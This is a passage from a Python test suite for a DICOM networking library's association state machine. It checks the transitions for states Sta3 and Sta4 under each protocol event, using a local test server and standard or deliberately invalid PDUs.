"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_ac),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt3', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rj),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt4', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt6', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:3] == ['Sta2', 'Sta3', 'Sta6']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate('reject'))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt8', 'AE-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', p_data_tf),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt10', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt12', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt13', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt15', 'AA-1'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_abort),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt16', 'AA-3')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('wait', 0.1),
('send', a_associate_rq),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt17', 'AA-4')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.5)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.2)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta3 + Evt19."""
# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt19', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt19']
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt3']
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt6']
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt7']
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt8']
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt9']
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt10']
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt11']
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt12']
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
while not self.fsm.current_state == 'Sta4':
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt13']
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt14']
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt15']
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
